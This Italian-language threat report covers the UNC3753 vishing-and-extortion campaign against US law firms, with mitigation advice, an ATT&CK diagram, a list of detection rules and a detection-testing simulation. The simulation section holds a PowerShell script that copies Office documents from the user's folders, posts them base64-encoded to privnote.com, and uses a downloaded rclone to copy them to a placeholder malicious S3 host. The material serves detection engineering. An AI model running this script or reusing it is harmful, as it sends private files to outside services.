Alla Ricerca di Consulenza: Attacchi Mirati in Corso Contro Studi Legali negli Stati Uniti
Segui 
Detection stack
- AIDR
- Alert
- ETL
- Query
Sommario
Un gruppo di minacce finanziariamente motivato, tracciato come UNC3753, sta conducendo campagne di vishing che ingannano le vittime facendole installare software di controllo e gestione remota. Una volta stabilito l’accesso, gli attori rubano informazioni legali e finanziarie sensibili e successivamente estorcono l’organizzazione vittima minacciando di esporle pubblicamente. La campagna è concentrata sulle aziende di servizi professionali degli Stati Uniti, in particolare degli studi legali, e potrebbe comportare il furto di dati sia informatici che fisici.
Indagine
Mandiant ha osservato il ciclo completo di intrusione, dalla chiamata iniziale di phishing vocale al furto di dati e all’estorsione, talvolta entro un solo giorno lavorativo. Le vittime sono state convinte a utilizzare strumenti di condivisione dello schermo e software RMM come AnyDesk, Bomgar, o un installer SuperOps personalizzato fornito con un comando curl. L’esfiltrazione dei dati è stata effettuata utilizzando strumenti come WinSCP, Rclone o caricamenti diretti su account di archiviazione cloud per consumatori.
Mitigazione
Le organizzazioni dovrebbero formare il personale a riconoscere i tentativi di vishing, imporre procedure di verifica rigorose per qualsiasi richiesta di supporto remoto e bloccare strumenti RMM e di condivisione dello schermo non autorizzati. Disabilitare i supporti rimovibili, monitorando trasferimenti insoliti verso destinazioni di archiviazione cloud o FTP, applicare controlli di accesso condizionali a VDI e imporre MFA su repository di documenti critici possono ridurre ulteriormente i rischi.
Risposta
Se questa attività viene rilevata, isolare immediatamente l’endpoint interessato, terminare qualsiasi sessione remota non autorizzata e rimuovere i binari RMM installati. Gli investigatori dovrebbero raccogliere la cronologia dei comandi, le modifiche al registro e i task programmati per la revisione forense. Le credenziali compromesse dovrebbero essere reimpostate, l’esfiltrazione dei dati dovrebbe essere valutata e l’intervento delle forze dell’ordine dovrebbe essere considerato se è iniziata un’estorsione.
"graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef technique fill:#ccccff classDef operator fill:#ff9900 %% Node definitions initial_access["<b>Azione</b> – <b>T1566.004 Phishing: Spearphishing Voice</b><br/><b>Descrizione</b>: L’attaccante utilizza una chiamata vocale convincente per ingannare il bersaglio affinché fornisca credenziali o esegua comandi dannosi."] class initial_access action user_execution["<b>Azione</b> – <b>T1204.002 File Dannoso</b><br/><b>Strumento</b>: cURL + MSI installer<br/><b>Descrizione</b>: La vittima esegue un file MSI dannoso scaricato tramite cURL, risultando in esecuzione di codice sul sistema."] class user_execution action remote_desktop["<b>Azione</b> – <b>T1219.002 Software per Desktop Remoto</b><br/><b>Strumenti</b>: Zoom, Microsoft Teams, AnyDesk<br/><b>Descrizione</b>: Applicazioni legittime per desktop remoto o meeting sono abusate per mantenere un accesso remoto persistente."] class remote_desktop action discovery["<b>Azione</b> – <b>T1083 Scoperta dei File e delle Directory</b> & <b>T1680 Scoperta dello Storage Locale</b><br/><b>Descrizione</b>: L’avversario enumera file, directory e posizioni di archiviazione locali per localizzare dati di valore da esfiltrare."] class discovery action data_staging["<b>Azione</b> – <b>T1074 Dati Preparati</b> & <b>T1560 Dati Archivio Raccolti</b><br/><b>Descrizione</b>: I file raccolti sono preparati localmente e compressi in archivi per predisporli per l’esfiltrazione."] class data_staging action exfiltration["<b>Azione</b> – <b>T1567.002 Esfiltrazione su Storage Cloud</b> & <b>T1020 Esfiltrazione Automatica</b><br/><b>Bersaglio</b>: Google Drive<br/><b>Descrizione</b>: Caricamento automatico degli archivi preparati su un servizio di archiviazione cloud per l’estrazione remota."] class exfiltration action physical_media["<b>Azione</b> – <b>T1052 Esfiltrazione su Supporto Fisico</b><br/><b>Descrizione</b>: Trasferimento di dati su supporti rimovibili per esfiltrazione offline quando i canali di rete sono limitati."] class physical_media action cleanup["<b>Azione</b> – <b>T1070.001 Cancellazione dei Log degli Eventi Windows</b><br/><b>Descrizione</b>: Cancellazione dei log degli eventi di Windows per eliminare le prove dell’intrusione."] class cleanup action %% Edge connections initial_access –>|leads_to| user_execution user_execution –>|enables| remote_desktop remote_desktop –>|enables| discovery discovery –>|leads_to| data_staging data_staging –>|enables| exfiltration exfiltration –>|leads_to| physical_media physical_media –>|followed_by| cleanup "
Flusso d’attacco
Rilevamenti
Software di Accesso Remoto / Gestione Alternativo (via creazione_processi)
Visualizza
Uso sospetto di CURL (via cmdline)
Visualizza
Tentativo di Installazione del Software RMM SuperOps Possibile (via evento_file)
Visualizza
Software di Accesso Remoto / Gestione Alternativo (via sistema)
Visualizza
Software di Accesso Remoto / Gestione Alternativo (via audit)
Visualizza
Tentativo di Installazione del Software RMM Usando MsiInstaller (via log delle applicazioni)
Visualizza
IOC (SourceIP) per rilevare: Consulenza Richiesta: Campagna Mirata Continua Contro Studi Legali USA
Visualizza
IOC (DestinationIP) per rilevare: Consulenza Richiesta: Campagna Mirata Continua Contro Studi Legali USA
Visualizza
Rilevamento di Condivisione di File Non Autorizzata e Traffico SSH ad Alto Volume [Firewall]
Visualizza
Esfiltrazione Dati UNC3753 Usando Privnote e Strumenti di Trasferimento File [Connessione di Rete Windows]
Visualizza
Accesso Remoto UNC3753 e Installazione MSI Dannosa [Creazione Processo Windows]
Visualizza
Esecuzione della Simulazione
Prerequisito: Il Controllo Pre-volo di Telemetria e Baseline deve essere stato superato.
Motivazione: Questa sezione dettaglia l’esatta esecuzione della tecnica avversaria (TTP) progettata per attivare la regola di rilevamento. I comandi e il racconto DEVONO riflettere direttamente i TTP identificati e mirano a generare la telemetria esatta attesa dalla logica di rilevamento. Esempi astratti o non correlati porteranno a una diagnosi errata.
-
Narrazione dell’Attacco e Comandi:
-
Ricognizione e Preparazione Dati (T1005, T1083):
L’avversario enumera le directory utente e copia tutti i*.docxand*.xlsxfile in una cartella di stagingC:TempStagedData. -
Caricamento via Privnote (T1567.002):
Usando PowerShell, l’attaccante legge ogni file, codifica il contenuto in base-64 e lo pubblica suhttps://privnote.com/api/note. La riga di comando include l’URL, che soddisfa lacondizione selection_privnote.Trasferimento con Rclone (T1020): -
Transfer with Rclone (T1020):
L’attaccante eseguerclone.exe(scaricato al volo) per trasferire i file preparati a un bucket S3 maligno. Il nome del processo “rclone.exe” corrisponde aselection_tool. -
Pulizia: Eliminare la cartella di staging e qualsiasi residuo binario.
-
-
Script di Test di Regressione: (PowerShell – autonomo, nessuna dipendenza esterna oltre
Invoke-WebRequest.)# ------------------------------------------------- # Simulazione Esfiltrazione UNC3753 – PowerShell # ------------------------------------------------- # 1. Preparare la directory di staging $staging = "$env:USERPROFILETempStagedData" New-Item -ItemType Directory -Force -Path $staging | Out-Null # 2. Copiare i dati di esempio (simulare la raccolta dati) Get-ChildItem -Path "$env:USERPROFILEDocuments" -Include *.docx, *.xlsx -Recurse -ErrorAction SilentlyContinue | ForEach-Object { Copy-Item -Path $_.FullName -Destination $staging -Force } # 3. Caricare ogni file su Privnote (esfiltrazione del servizio web) $privnoteUrl = "https://privnote.com/api/note" Get-ChildItem -Path $staging -File | ForEach-Object { $content = [Convert]::ToBase64String([IO.File]::ReadAllBytes($_.FullName)) $body = @{ text = $content } # L'URL appare nella linea di comando -> attiva selection_privnote Invoke-WebRequest -Uri $privnoteUrl -Method POST -Body $body -UseBasicParsing | Out-Null } # 4. Scaricare Rclone (se non presente) ed esfiltrare via S3 $rcloneExe = "$env:TEMPrclone.exe" if (-not (Test-Path $rcloneExe)) { Invoke-WebRequest -Uri "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -OutFile "$env:TEMPrclone.zip" Expand-Archive -Path "$env:TEMPrclone.zip" -DestinationPath $env:TEMP -Force Move-Item -Path (Get-ChildItem "$env:TEMPrclone-*-windows-amd64rclone.exe").FullName -Destination $rcloneExe -Force } # Configurare un remoto (maligno) bucket S3 – la configurazione è scritta su un file temporaneo $rcloneConfig = @" [malicious type = s3 provider = AWS access_key_id = AKIAFAKEKEY secret_access_key = fakeSecretKey123 region = us-east-1 endpoint = https://malicious-s3.example.com "@ $configPath = "$env:TEMPrclone.conf" $rcloneConfig | Set-Content -Path $configPath -Encoding ASCII # Esegui il comando rclone copy – il nome del processo "rclone.exe" attiva selection_tool & $rcloneExe copy $staging "malicious:exfil" --config $configPath --log-level INFO # 5. Pulizia Remove-Item -Recurse -Force $staging Remove-Item -Force $rcloneExe, $configPath -
Comandi di Pulizia:
# Terminare eventuali processi WinSCP o Rclone in sospeso Get-Process -Name WinSCP, rclone -ErrorAction SilentlyContinue | Stop-Process -Force # Eliminare i file temporanei residui (se presenti) Remove-Item -Path "$env:TEMPWinSCP.exe","$env:TEMPWinSCP.zip","$env:TEMPrclone.zip","$env:TEMPrclone-*-windows-amd64" -Recurse -Force -ErrorAction SilentlyContinue